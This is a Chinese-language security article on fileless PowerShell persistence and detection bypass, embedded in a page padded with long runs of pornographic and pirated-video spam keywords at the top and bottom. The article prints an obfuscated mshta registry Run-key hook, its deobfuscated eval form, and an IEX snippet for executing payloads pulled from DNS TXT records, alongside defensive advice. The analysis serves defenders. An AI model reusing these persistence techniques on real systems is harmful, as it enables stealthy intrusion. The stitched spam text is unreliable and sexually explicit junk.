精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

PowerShell注入技巧:無盤持久性和繞過技術

安全 網站安全
由于安全研究人員和網絡攻擊者會遇到越來越先進的PowerShell以及相應的檢測繞過技術,而且隨著代碼混淆技術的不斷發展,安全防御人員的工作更是難上加難。

寫在前面的話

PowerShell是網絡安全專家、IT管理員以及黑客們最喜歡的工具之一,這一點是毋庸置疑的。PowerShell的可擴展性和其強大的功能讓微軟操作系統的可控制程度上升到了一個前所未有的等級。簡單說來,Powershell 是運行在windows機器上實現系統和應用程序管理自動化的命令行腳本環境,而它可以算是顛覆了傳統的命令行提示符-cmd.exe。

在Binary Defense(一家專業從事網絡安全業務的公司)中有著大量PowerShell的擁護者,無論是進行自動化測試也好,還是進行復雜的程序分析也罷,PowerShell都是他們的首選工具。除此之外,像PowerShell Empire以及PowerSploit這樣的工具也是網絡安全研究領域以及黑客的摯愛。

[[190526]]

攻擊分析

我們通常可以看到很多利用PowerShell的攻擊向量,而且在昨天晚上,我們的終端安全檢測與應急響應平臺(Vision)檢測到了一個使用了多種方法來實現攻擊持久化并規避傳統反病毒技術的攻擊事件。它所使用的第一種方法是讓目標用戶訪問一個需要升級Adobe Flash瀏覽器插件的網站,而攻擊者在這里需要使用到mshta.exe(一種HTA攻擊方法),MSHTA.exe是微軟的一個合法程序,它可以在任何瀏覽器中隨時調用。但是在大多數情況下,它并不是合法的擴展,因此我們建議用戶在配置防火墻時屏蔽所有的HTA擴展。因為HTA文件允許我們調用任意的命令,而攻擊者同樣可以做到這一點,所以啟用HTA擴展很有可能讓我們的主機遭到攻擊。

需要注意的是,這個攻擊向量在很多年前就已經嵌入在了Unicorn和社會工程學工具套件(SET)之中了。

PowerShell的攻擊向量

此時,如果系統彈出了提示框,而攻擊者又根據提示框中的信息進行了操作(打開-open),那么目標用戶將會被攻擊。攻擊向量可以是一個VBS下載器、PowerShell,或者是一段下載后自動執行的惡意代碼。只要用戶點擊了“Open”,任何事情都有可能會發生。但是在我們近期所研究的攻擊案例中,攻擊者使用了HTA攻擊方法作為攻擊的初始階段和Dropper。

頁面會發起一個惡意HTA,當用戶打開了這個HTA之后,Vision會立刻檢測到其惡意行為:

惡意HTA

當文件被打開之后,一段PowerShell命令將會被執行。一般情況下攻擊者會通過PowerShell發動SYSWOW64降級攻擊,這種攻擊向量可以將進程降級為32位進程,并實現shellcode注入攻擊,而且Unicorn/SET多年以來一直都在使用這種技術。

在對具體的日志記錄進行了分析之后我們發現,很多攻擊者會使用Invoke-Expression(IEX)來提取出特定的注冊表鍵,并實現持久化鉤子。在PowerShell的初始調用中,變量名和持久化鉤子都經過了混淆處理。大致如下圖所示:

在PowerShell的初始調用中,變量名和持久化鉤子都經過了混淆處理

在這種攻擊中,注冊表入口位于CurrentVersion\Run,而這里也是持久化鉤子的起始位置。

日志信息如下:

混淆后的持久化注冊表鉤子:

  1. HKEY_USERS:SANITIZED\Software\Microsoft\Windows\CurrentVersion\Run 
  2. "C:\Windows\system32\mshta.exe" "about:<script>c1hop="X642N10";R3I=new%20ActiveXObject("WScript.Shell");QR3iroUf="I7pL7";k9To7P=R3I.RegRead("HKCU\\software\\bkzlq\\zsdnhepyzs");J7UuF1n="Q2LnLxas";eval(k9To7P);JUe5wz3O="zSfmLod";</script>

反混淆后的持久化注冊表鉤子:

  1. <script> 
  2. WScript_Shell_Object = new ActiveXObject("WScript.Shell"); 
  3. Registry_Key_Value=WScript_Shell_Object.RegRead("HKCU\\software\\bkzlq\\zsdnhepyzs"); 
  4. eval(Registry_Key_Value); 
  5. </script> 

這種就是我們所稱之為的無文件攻擊向量,因為它不需要向硬盤寫入任何內容,它唯一需要的就是注冊表鍵,并通過運行注冊表鍵來在目標系統中實現持久化注入。在我們的攻擊場景中,mshta.exe將利用嵌入了PowerShell指令的WScript.shell來調用特定的注冊表鍵,而且傳統的反病毒產品以及目前絕大多數安全解決方案都無法檢測到這種無文件的持久化攻擊。

利用原生的PowerShell以及mshta,攻擊者將可以通過傳統的感染技術來實現系統入侵,而且完全不需要下載額外的惡意代碼或安插系統后門。在此過程中,大多數攻擊者會選擇使用Invoke-Expression,但是具體的攻擊實現方法也是多種多樣的。近期,安全研究專家Vincent Yiu(@vysecurity)演示了一種無需調用IEX和ExcodedCommand就可以繞過傳統檢測技術的攻擊方法,而且目前很多高級攻擊者也在廣泛使用這種技術。有關這項技術的更多詳細內容請參考Vincent Yiu的Twitter:

繞過傳統檢測技術的攻擊方法

在這個例子中,網站的TXT記錄將會下載PowerShell命令,并通過nslookup在系統中執行這些命令。這也就意味著,我們可以將命令注入在DNS的TXT記錄中,然后讓系統自動執行這些PowerShell命令。Vision所檢測到的一種惡意行為模式如下:

Vision所檢測到的一種惡意行為模式

如果檢測到了nslookup或者代碼提取行為,那么Vision將能夠迅速識別出PowerShell代碼中的nslookup請求以及TXT記錄中的惡意代碼。需要注意的是,Vencent Yiu所提供的方法只能執行一個文件而無法執行代碼本身,因此我們還需要其他的命令從nslookup TXT記錄中提取出代碼并執行它們。

安全研究專家Daniel Bohannon給出了一種不同的實現方法,但這種方法仍然需要用到IEX。演示樣例如下:

  1. $nslookupResult1 = 'iex' 
  2. $nslookupResult2 = 'Write-Host THIS IS MY ACTUAL PAYLOAD -f green' 
  3. . $nslookupResult1 $nslookupResult2 
  4.    
  5. or even better: 
  6.    
  7. $nslookupAllInOne = @('iex','Write-Host ALL IN ONE -f green') 
  8. . $nslookupAllInOne[0] $nslookupAllInOne[1] 

下圖為Vision所識別出的一種特定攻擊模式:

Vision所識別出的一種特定攻擊模式

應對方案

對于那些沒有使用Vision代碼防御平臺的企業來說,可以采用以下幾種實踐方法來防止攻擊者利用PowerShell攻擊企業的網絡系統:

  • 限制PowerShell命令的字符長度;
  • 限制PowerShell的語言模式;
  • 啟用增強型PowerShell;(參考資料);
  • 定期執行威脅檢測以盡早識別出可疑活動;
  • 審查DNS日志并尋找可疑的控制命令和DNS請求;
  • 搜索可疑的System.Management.Automation.dll以及System.Management.Automation.ni.dll
  • 利用類似Sysmon這樣的工具來檢測和記錄可疑進程;
  • 在正常情況下禁止普通用戶執行PowerShell命令(AppLocker +Device Guard可以防止普通用戶使用PowerShell);
  • 監控powershell.exe的子進程以及可能存在的鉤子;
  • 搜索powershell.exe派生出的32位PowerShell子進程,這也是一種shellcode注入技術的典型檢測方法;

更多內容請參考Matthew Graeber的Twitter;

總結

由于安全研究人員和網絡攻擊者會遇到越來越先進的PowerShell以及相應的檢測繞過技術,那些基于模式識別的傳統檢測方法已經不能再僅僅依靠惡意PowerShell來完成檢測了,而且隨著代碼混淆技術的不斷發展,安全防御人員的工作更是難上加難。因此,我們只有盡早地識別出可疑的行為模式,才能夠降低個人用戶和企業用戶受到攻擊的可能性。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2013-07-09 10:18:58

VDI虛擬化

2019-01-17 04:41:38

2021-05-25 10:20:31

Python持久性編程語言

2009-09-27 09:55:38

Hibernate持久

2019-09-06 09:50:52

云存儲硬盤云服務

2021-12-29 14:04:14

惡意軟件黑客網絡攻擊

2009-09-23 15:25:08

Hibernate 3

2022-10-27 08:00:32

DockerAWS云容器

2017-09-07 15:39:27

2021-01-22 10:40:08

Linux文件內存

2021-06-02 08:00:00

MOSH開源工具

2009-09-15 16:37:06

Google App 持久性

2013-01-11 16:23:29

2023-12-08 08:26:05

數據存儲持久性

2025-06-09 00:04:00

2014-06-05 14:41:05

亞馬遜AWS

2015-10-12 11:37:07

2017-11-06 05:52:52

2023-02-28 09:47:42

2013-07-23 15:10:34

PowerShell
點贊
收藏

51CTO技術棧公眾號

国产精品va在线观看视色| 在线观看国产精品视频| 欧美综合自拍| 欧美视频自拍偷拍| 国产精品av免费观看| 亚洲欧洲综合在线| 美国欧美日韩国产在线播放| 欧美极品少妇xxxxⅹ喷水| 亚洲午夜久久久久久久久红桃 | 精品久久一区| 欧美一区二区三区人| 大肉大捧一进一出好爽视频| 日本电影在线观看网站| 99在线视频精品| 成人性生交大片免费观看嘿嘿视频| 中文在线观看免费网站| 99精品在线| 亚洲人高潮女人毛茸茸| 蜜臀aⅴ国产精品久久久国产老师| 日本综合视频| 欧美日韩精品国产| 亚洲啊啊啊啊啊| 999国产在线视频| 26uuu精品一区二区三区四区在线 26uuu精品一区二区在线观看 | 免费av成人在线| 91产国在线观看动作片喷水| 久久高清无码视频| 国产精品久久久乱弄| 亚洲午夜av电影| 欧美 变态 另类 人妖| 麻豆国产一区| 9191成人精品久久| 视频二区在线播放| 日韩欧美另类一区二区| 黄色成人在线免费| 国产女主播自拍| 国产精品久久麻豆| 亚洲国产电影在线观看| 日本成人黄色| 免费在线黄色影片| 91免费小视频| 久久精品女人的天堂av| 天天干天天草天天射| 懂色av一区二区三区免费看| 91影视免费在线观看| 中文字幕制服诱惑| 日韩精品1区2区3区| 欧美最顶级丰满的aⅴ艳星| 日本中文字幕网| 国内在线观看一区二区三区| 欧美精品videosex牲欧美| 91日韩中文字幕| 亚洲澳门在线| 久久国产精品影片| 欧美黄色aaa| 亚洲字幕久久| 欧美日韩福利电影| 黄色小视频在线免费看| 欧美日本精品| 国产69精品久久久| 91看片在线播放| 一区二区三区成人精品| 日本高清不卡的在线| 无码人妻精品一区二区50| 日本在线播放一区二区三区| 国产玖玖精品视频| 99在线精品视频免费观看20| 国产成人精品影院| 国产一区二区在线观看免费播放| 日批视频免费播放| 久久婷婷成人综合色| 精品无人区一区二区三区竹菊| 日韩国产福利| 国产精品网站在线播放| 青少年xxxxx性开放hg| 日本在线观看高清完整版| 一区二区三区在线免费| 免费超爽大片黄| 欧美aa视频| 4438x亚洲最大成人网| 极品白嫩的小少妇| 曰本一区二区三区视频| 日韩中文字幕网| 久久久精品人妻一区二区三区四 | 日韩欧美精品| 九九热这里只有精品6| 国产精品自拍99| 美国毛片一区二区| 国产偷久久久精品专区| 二区三区在线| 亚洲主播在线观看| 狠狠热免费视频| 欧美影院在线| 亚洲精品色婷婷福利天堂| 貂蝉被到爽流白浆在线观看| 红桃视频国产一区| 国产精品美女久久久免费| 性中国xxx极品hd| 久久精品亚洲麻豆av一区二区| 公共露出暴露狂另类av| 三上悠亚国产精品一区二区三区| 在线成人小视频| www.色天使| 你懂的视频一区二区| 欧美亚洲视频一区二区| 国产精品老熟女视频一区二区| 成年人午夜久久久| 亚洲一区在线直播| 麻豆理论在线观看| 这里是久久伊人| 欧美熟妇激情一区二区三区| 亚洲婷婷免费| 成人乱人伦精品视频在线观看| 欧美视频综合| 亚洲一区二区三区精品在线| 97超碰人人爽| 国产精品一在线观看| 海角国产乱辈乱精品视频| 亚洲无码久久久久久久| 91麻豆福利精品推荐| 久久久99精品视频| 亚洲一区二区小说| 国产亚洲人成a一在线v站| 日韩和一区二区| 国产真实乱偷精品视频免| 污视频在线免费观看一区二区三区| 91吃瓜在线观看| 日韩精品中午字幕| 欧美成人777| 久久66热re国产| 性刺激综合网| 久久天堂av| 亚洲美女黄色片| 日韩免费视频一区二区视频在线观看| 大美女一区二区三区| 永久免费看av| 欧美2区3区4区| 欧美成人精品在线视频| 91久久久久国产一区二区| 国产视频一区二区在线| 欧美黄网站在线观看| 欧美挤奶吃奶水xxxxx| 国内精品久久久| 欧美一级视频免费| 亚洲一区二区在线免费观看视频| 三级av免费看| 欧美 日韩 国产精品免费观看| 成人免费大片黄在线播放| www红色一片_亚洲成a人片在线观看_| 欧美日韩精品福利| 日韩欧美国产成人精品免费| 黑人巨大精品欧美黑白配亚洲| 视频一区二区视频| 91精品视频一区二区| 久热精品视频在线| www.国产免费| 亚洲国产综合91精品麻豆| 国产欧美视频一区| 99精品视频免费观看视频| 狠狠色噜噜狠狠色综合久| 国产不卡123| 亚洲欧美国内爽妇网| 波多野结衣一区二区在线| 欧美国产日韩亚洲一区| 在线不卡一区二区三区| 亚洲成av人片乱码色午夜| 国产91视觉| 欧美伦理91| 中文字幕日韩av电影| 国产精品毛片久久久久久久av| 亚洲欧美日韩系列| 无码人妻aⅴ一区二区三区玉蒲团| 狠狠入ady亚洲精品经典电影| 国新精品乱码一区二区三区18| 午夜影院一区| 日韩在线播放视频| 成人午夜免费福利| 色狠狠色噜噜噜综合网| 久久av红桃一区二区禁漫| 国产精品系列在线播放| 妞干网在线视频观看| 精品国产中文字幕第一页| 国产日韩欧美中文| 韩国成人免费视频| 亚洲性无码av在线| 精品国产九九九| 一本一道综合狠狠老| 永久免费看mv网站入口| 成人精品免费看| 国产精品区在线| 亚洲高清不卡| 亚洲一区综合| 亚洲精品456| 亚洲精品欧美一区二区三区| 亚洲精品mv| 欧美大肥婆大肥bbbbb| 青青青草网站免费视频在线观看| 欧美日韩一级大片网址| 黄色激情视频在线观看| 国产精品久久三| 黄色污在线观看| 久久99精品久久久| 97成人在线观看视频| 亚洲成人三区| 午夜精品视频在线观看一区二区| а√中文在线天堂精品| 成人妇女淫片aaaa视频| 在线观看的黄色| 欧美床上激情在线观看| 成人在线免费观看| 精品一区二区三区三区| 国产叼嘿视频在线观看| 欧美三级在线播放| 欧美特黄aaaaaa| 亚洲国产视频在线| 日本精品999| 国产精品色网| 成人国产在线看| 天天做天天爱天天爽综合网| 蜜桃av噜噜一区二区三| 亚洲小说春色综合另类电影| 国产精品视频地址| 超碰超碰人人人人精品| 久久久噜久噜久久综合| 国产在线高清视频| 这里只有视频精品| 欧美日韩国产中文字幕在线| 亚洲韩国日本中文字幕| 性生活免费网站| 777xxx欧美| 国产精品人妻一区二区三区| 日本大香伊一区二区三区| 你懂的国产视频| 午夜影视日本亚洲欧洲精品| 久久精品一级片| 一区二区三区蜜桃| 少妇久久久久久被弄高潮| 亚洲欧美国产高清| 国产av无码专区亚洲av毛网站| 中文字幕日韩欧美一区二区三区| www.日本高清视频| 中文字幕乱码亚洲精品一区| caopeng视频| 国产亚洲综合在线| 国产成人av一区二区三区不卡| xfplay精品久久| 亚洲自拍偷拍一区二区| 久久综合资源网| 日韩乱码人妻无码中文字幕久久| 久久嫩草精品久久久久| 成年人网站免费在线观看| 久久先锋影音av| 日本少妇xxxxx| 国产精品视频看| av最新在线观看| 亚洲黄色小说网站| 免费在线观看国产精品| 亚洲成人久久影院| 欧美一二三区视频| 色偷偷一区二区三区| 成人免费一区二区三区| 在线91免费看| 人妻精品一区一区三区蜜桃91| 亚洲国产精彩中文乱码av在线播放 | 成人午夜小视频| 欧美第一在线视频| 国模精品娜娜一二三区| 亚洲v天堂v手机在线| 污视频在线免费观看一区二区三区 | 国产精品免费av一区二区| 精品久久久久久久久国产字幕| 无码一区二区三区| 欧美日本高清视频在线观看| 国产福利免费视频| 亚洲国产成人在线视频| 国产精品免费观看| 久久久精品久久| 大桥未久在线视频| 国产精品视频自在线| 国产一区二区三区免费观看在线| 国产精品美女诱惑| 国产剧情在线观看一区| 免费观看国产视频在线| 在线视频精品| 亚洲一区二区三区四区五区| 成人免费va视频| 在线看片中文字幕| 亚洲一区二区三区美女| 黄色av一区二区| 日韩精品一区二区三区视频 | 久久久久久免费精品| 欧美黑人粗大| 99理论电影网| 欧美色图国产精品| 隔壁人妻偷人bd中字| 日韩精品高清不卡| 蜜臀av粉嫩av懂色av| 中文字幕亚洲区| 亚洲黄色小说图片| 日韩午夜精品电影| 国产区av在线| 97人洗澡人人免费公开视频碰碰碰| 国产69精品久久| 久久久久天天天天| 亚洲综合自拍| 国产又猛又黄的视频| 99久久精品国产导航| 国产日韩欧美在线观看视频| 欧美中文一区二区三区| 日本黄色免费视频| 久久国产精品影视| 国内欧美日韩| 欧美在线播放一区| 一区二区三区精品视频在线观看| 日本中文字幕在线不卡| 日本一区二区三区在线观看| 成人毛片18女人毛片| 欧美电影免费提供在线观看| 日本成人网址| 国产精品视频久| 国产欧美日韩在线观看视频| 日韩欧美国产免费| 国产凹凸在线观看一区二区| 中文字幕观看av| 欧美三级电影一区| 国产午夜在线观看| 欧美与欧洲交xxxx免费观看| 国产精品香蕉| 99热久久这里只有精品| 国产一区二区精品久久| 成人性视频免费看| 欧美日韩国产精品自在自线| 国产小视频在线| 青青草成人在线| 免费成人av| 欧美少妇性生活视频| 久久中文娱乐网| 欧美精品韩国精品| 亚洲女人被黑人巨大进入| 小早川怜子影音先锋在线观看| 国产自产在线视频一区| 亚洲三级网站| 国产 中文 字幕 日韩 在线| 精品国产电影一区| 男同在线观看| 国产激情999| 国产精品久久久久蜜臀| 亚洲一二区在线观看| 亚洲精品国产精品乱码不99| 性欧美8khd高清极品| 久久久人成影片一区二区三区观看 | 亚洲人午夜色婷婷| 偷拍视频一区二区三区| 日韩精品无码一区二区三区| 美女在线一区二区| 中文字幕电影av| 欧美成人女星排行榜| 91探花在线观看| 农村寡妇一区二区三区| 日韩经典中文字幕一区| 一级黄色片日本| 日韩一级片在线观看| 久久不射影院| 精品无人乱码一区二区三区的优势| 男人天堂欧美日韩| 久久久久亚洲AV成人无在| 777亚洲妇女| 国产传媒在线| 日本欧美色综合网站免费| 理论电影国产精品| 久久国产在线视频| 亚洲女人初尝黑人巨大| 偷拍自拍亚洲| 成人精品视频在线播放| 国产午夜亚洲精品理论片色戒 | 久久99国产精品久久| 久久激情免费视频| 亚洲欧美另类人妖| 亚洲综合伊人| 国产视频一视频二| 国产精品久久福利| 国产 日韩 欧美 综合| 国产精品xxxxx| 欧美一区二区三区另类| asian性开放少妇pics| 欧美日韩高清一区二区| av色在线观看| 亚洲国产一区二区三区在线| 粉嫩av一区二区三区在线播放| 无码人妻精品一区二区50| 精品中文字幕视频| 神马电影久久| 国产无套精品一区二区三区| 日本电影亚洲天堂一区| 蜜臀av在线| 在线观看欧美一区| 91麻豆国产香蕉久久精品| 精品国自产在线观看| 国产精品美女999| 国产欧美午夜|